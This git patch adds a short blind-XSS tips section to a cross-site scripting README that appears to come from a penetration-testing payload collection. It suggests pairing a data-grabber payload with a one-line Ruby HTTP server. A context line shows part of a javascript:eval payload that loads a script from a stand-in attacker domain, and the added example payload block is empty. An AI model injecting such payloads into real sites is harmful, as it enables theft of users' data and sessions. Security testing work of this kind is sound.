From c469236204861ee8cadc2e546897fef496dff95d Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Wed, 16 Jun 2021 13:25:46 +0200 Subject: [PATCH] XSS: add quick tips for bXSS --- XSS Injection/README.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 45a49a1..b5fed57 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -453,6 +453,22 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu - Comment Box - Administrative Panel +### Tips + +You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform. + +Eg. payload + +```html + +``` + +Eg. one-line HTTP server: + +``` +$ ruby -run -ehttpd . -p8080 +``` + ## Mutated XSS Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.